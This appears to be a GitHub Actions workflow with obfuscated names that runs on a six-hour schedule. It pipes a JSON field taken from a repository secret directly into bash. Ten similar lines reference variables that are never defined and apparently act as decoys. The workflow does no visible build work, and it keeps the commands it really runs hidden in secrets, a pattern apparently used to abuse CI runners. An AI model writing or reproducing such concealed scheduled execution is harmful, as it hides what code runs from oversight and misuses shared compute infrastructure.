name: strengthteammate

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: strengthteammate
        env:
          pomeg015: ${{ secrets.pomeg015 }}
        run: |
          echo $pomeg015 | jq -r .mo45678 | /bin/bash
          echo $gxxhv28005 | jq -r .exakr768 | /bin/bash
          echo $opd777 | jq -r .oqb707 | /bin/bash
          echo $umw4908 | jq -r .tj1189 | /bin/bash
          echo $hsjer98227 | jq -r .sfgg8274 | /bin/bash
          echo $w34 | jq -r .u1 | /bin/bash
          echo $vpmr26705 | jq -r .z07747 | /bin/bash
          echo $xr208 | jq -r .b5 | /bin/bash
          echo $xcssr93106 | jq -r .d31661 | /bin/bash
          echo $an4024 | jq -r .b9 | /bin/bash
          echo $ijnf29540 | jq -r .javus6 | /bin/bash

